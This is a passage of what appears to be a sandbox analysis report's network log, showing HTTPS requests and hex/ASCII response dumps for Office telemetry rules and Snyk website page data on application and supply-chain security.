                                                                                                                                                                                                                                                                                                              Data Ascii: 00001FA3avItem","label":"Pricing","url":"/plans/","dropdownMenuCategories":{"items":[],"__typename":"NavigationPrimaryNavItemDropdownMenuCategoriesCollection"},"dropdownMenuColumns":{"items":[],"__typename":"NavigationPrimaryNavItemDropdownMenuColumnsCo
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              94192.168.2.54985513.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:11 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 407
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 7de7ed35-901e-005b-7c14-222005000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194911Z-16849878b784cpcc2dr9ch74ng00000008ag000000004c0t
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              95192.168.2.54985823.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC467OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/application-security.json?slug=solutions&slug=application-security HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC644INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"ycn3igbcer1m6s"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/application-security.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::2fcxt-1729799351285-a5abe8bded17
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:11 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799351.1095050
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC15740INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 36 61 74 64 6a 6e 66 30 32 67 4e 32 6c 72 69 36 51 4a 75 74 70 43 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 30 34 54 31 36 3a 33 35 3a 35 35 2e 34 36 30 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 33 2d 31 34 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6atdjnf02gN2lri6QJutpC","type":"Entry","createdAt":"2022-11-04T16:35:55.460Z","updatedAt":"2024-03-14T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC8848INData Raw: 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 31 2d 32 33 54 31 35 3a 35 39 3a 32 33 2e 35 35 36 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 32 36 54 31 33 3a 31 34 3a 30 38 2e 32 33 37 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 31 35 2c 22 72 65 76 69 73 69 6f 6e 22 3a 33 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22
                                                                                                                                                                                                                                                                                                              Data Ascii: try","createdAt":"2024-01-23T15:59:23.556Z","updatedAt":"2024-07-26T13:14:08.237Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":15,"revision":3,"contentType":{"sys":{"type":"Link","linkType":"ContentType"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 69 74 79 20 73 63 61 6e 6e 69 6e 67 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 4f 75 72 20 75 6e 6c 69 6d 69 74 65 64 20 73 63 61 6e 6e 69 6e 67 20 28 77 69 74 68 20 6e 6f 20 6c 69 6e 65 20 6f 66 20 63 6f 64 65 20 72 65 73 74 72 69 63 74 69 6f 6e 73 29 20 6c 65 74 73 20 64 65 76 65 6c 6f 70 6d 65 6e 74 20 61 6e 64 20 73 65 63 75 72 69 74 79 20 74 65 61 6d 73 20 73 63 61 6e 20 65 61 72 6c 79 20 61 6e 64 20 6f 66 74 65 6e 2c 20 70 72 6f 61 63 74 69 76 65 6c 79 20 74 61 63 6b 6c 65 20 76 75 6c 6e 65 72
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000ity scanning","description":{"data":{},"content":[{"data":{},"content":[{"data":{},"marks":[],"value":"Our unlimited scanning (with no line of code restrictions) lets development and security teams scan early and often, proactively tackle vulner
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC8204INData Raw: 74 75 72 65 64 2d 69 6d 61 67 65 2d 61 69 2d 67 65 6e 65 72 61 74 65 64 2d 63 6f 64 65 2d 72 65 70 6f 72 74 22 2c 22 63 72 65 61 74 65 64 5f 61 74 22 3a 22 32 30 32 33 2d 31 31 2d 32 37 54 31 38 3a 33 35 3a 33 32 5a 22 2c 22 73 65 63 75 72 65 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 73 6e 79 6b 2f 69 6d 61 67 65 2f 75 70 6c 6f 61 64 2f 76 31 37 30 31 31 31 30 31 33 32 2f 66 65 61 74 75 72 65 64 2d 69 6d 61 67 65 2d 61 69 2d 67 65 6e 65 72 61 74 65 64 2d 63 6f 64 65 2d 72 65 70 6f 72 74 2e 6a 70 67 22 2c 22 72 65 73 6f 75 72 63 65 5f 74 79 70 65 22 3a 22 69 6d 61 67 65 22 7d 5d 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 62 6c 6f 67 22 2c 22 68 65 61 64 6c 69 6e 65 22 3a 22 43 72 65 61 74 69 6e 67 20
                                                                                                                                                                                                                                                                                                              Data Ascii: tured-image-ai-generated-code-report","created_at":"2023-11-27T18:35:32Z","secure_url":"https://res.cloudinary.com/snyk/image/upload/v1701110132/featured-image-ai-generated-code-report.jpg","resource_type":"image"}],"category":"blog","headline":"Creating
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 22 2c 22 72 6f 77 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 37 70 4e 39 56 61 6b 6b 32 68 34 33 37 79 61 65 70 56 78 7a 30 63 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 22 2c 22 6c 61 62 65 6c 22 3a 22 50 72 6f 64 75 63 74 73 22 2c 22 73 70 6f 74 6c 69 67 68 74 46 69
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000e":"NavigationDropdownMenuColumn","rows":{"__typename":"NavigationDropdownMenuColumnRowsCollection","items":[{"sys":{"id":"7pN9Vakk2h437yaepVxz0c","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumnRow","label":"Products","spotlightFi
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC12INData Raw: 6f 77 73 43 6f 6c 6c 65 63 74 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: owsCollect
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC9915INData Raw: 30 30 30 30 32 36 41 46 0d 0a 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 33 79 48 34 42 6f 62 71 54 6f 6d 4c 30 35 70 77 67 67 32 62 32 49 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 22 2c 22 6c 61 62 65 6c 22 3a 6e 75 6c 6c 2c 22 73 70 6f 74 6c 69 67 68 74 46 69 72 73 74 49 74 65 6d 22 3a 66 61 6c 73 65 2c 22 74 69 74 6c 65 54 65 78 74 22 3a 6e 75 6c 6c 2c 22 73 75 62 6d 65 6e 75 4c 69 6e 6b 73 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 49 74 65 6d 73 43 6f 6c
                                                                                                                                                                                                                                                                                                              Data Ascii: 000026AFion","items":[{"sys":{"id":"3yH4BobqTomL05pwgg2b2I","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumnRow","label":null,"spotlightFirstItem":false,"titleText":null,"submenuLinks":{"__typename":"NavigationDropdownMenuColumnRowItemsCol
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              96192.168.2.54985923.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC475OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/secure-ai-generated-code.json?slug=solutions&slug=secure-ai-generated-code HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC649INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"13pk7o6r0t81bs0"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/secure-ai-generated-code.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::p9kgj-1729799351706-130dce76b908
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:11 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799351.109527d
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC15735INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 32 33 49 4e 53 48 52 39 71 77 6d 38 77 55 48 6e 72 46 75 5a 69 35 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 31 30 2d 31 32 54 31 34 3a 30 33 3a 31 37 2e 32 31 38 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 36 2d 32 34 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"23INSHR9qwm8wUHnrFuZi5","type":"Entry","createdAt":"2023-10-12T14:03:17.218Z","updatedAt":"2024-06-24T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC8853INData Raw: 69 6c 6f 74 20 74 6f 20 71 75 69 63 6b 6c 79 20 77 72 69 74 65 20 63 6f 64 65 2e 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 70 61 72 61 67 72 61 70 68 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 64 6f 63 75 6d 65 6e 74 22 7d 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 74 65 78 74 47 72 69 64 49 74 65 6d 22 3a 7b 7d 7d 7d 7d 2c 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 50
                                                                                                                                                                                                                                                                                                              Data Ascii: ilot to quickly write code.","nodeType":"text"}],"nodeType":"paragraph"}],"nodeType":"document"},"appearance":{"textGridItem":{}}}},{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"P
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 3a 22 32 30 32 33 2d 31 30 2d 31 32 54 31 34 3a 30 33 3a 31 38 2e 35 34 31 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 31 2d 32 33 54 31 39 3a 34 31 3a 35 31 2e 36 31 33 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 7d 7d 2c 22 70 75 62 6c 69 73 68 65 64 56 65 72 73 69 6f 6e 22 3a 31 38 2c 22 72 65 76 69 73 69 6f 6e 22 3a 35 2c 22 63 6f 6e 74 65 6e 74 54 79 70 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 43 6f 6e 74 65 6e 74 54 79 70 65 22 2c 22 69 64 22 3a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000:"2023-10-12T14:03:18.541Z","updatedAt":"2024-01-23T19:41:51.613Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":18,"revision":5,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC8204INData Raw: 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 43 6f 64 65 20 43 68 65 63 6b 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 6e 75 6c 6c 2c 22 75 72 6c 22 3a 22 2f 63 6f 64 65 2d 63 68 65 63 6b 65 72 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 69 6e 66 6f 2d 73 63 61 6e 22 7d 7d 7d 5d 7d 7d 2c 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 32 4b 59 73 39 4a 39 32 37 51 68 55 69 34 4d 31 7a 61 67 68 4f 4b 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 6f 6c 75 6d 6e 52 6f 77 22 2c
                                                                                                                                                                                                                                                                                                              Data Ascii: _typename":"ContentNavigationItem","label":"Code Checker","description":null,"url":"/code-checker/","appearance":{"navItem":{"icon":"info-scan"}}}]}},{"sys":{"id":"2KYs9J927QhUi4M1zaghOK","__typename":"Sys"},"__typename":"NavigationDropdownMenuColumnRow",
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC12823INData Raw: 30 30 30 30 33 32 30 42 0d 0a 79 73 22 3a 7b 22 69 64 22 3a 22 34 39 45 77 6f 4f 6e 49 41 4d 70 53 6d 76 57 43 4d 32 35 5a 37 43 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 4e 61 76 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 43 6f 6d 70 61 6e 79 22 2c 22 75 72 6c 22 3a 6e 75 6c 6c 2c 22 64 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 61 74 65 67 6f 72 69 65 73 22 3a 7b 22 69 74 65 6d 73 22 3a 5b 5d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 4e 61 76 69 67 61 74 69 6f 6e 50 72 69 6d 61 72 79 4e 61 76 49 74 65 6d 44 72 6f 70 64 6f 77 6e 4d 65 6e 75 43 61 74 65 67 6f 72 69 65 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 7d 2c 22 64 72 6f 70 64 6f 77 6e 4d 65
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000320Bys":{"id":"49EwoOnIAMpSmvWCM25Z7C","__typename":"Sys"},"__typename":"NavigationPrimaryNavItem","label":"Company","url":null,"dropdownMenuCategories":{"items":[],"__typename":"NavigationPrimaryNavItemDropdownMenuCategoriesCollection"},"dropdownMe
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              97192.168.2.54985723.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:11 UTC487OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/software-supply-chain-security.json?slug=solutions&slug=software-supply-chain-security HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:12 UTC654INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"pbwj1v0cm930yr"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/software-supply-chain-security.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::wgh2h-1729799351679-400877139ce2
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:11 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799351.1095248
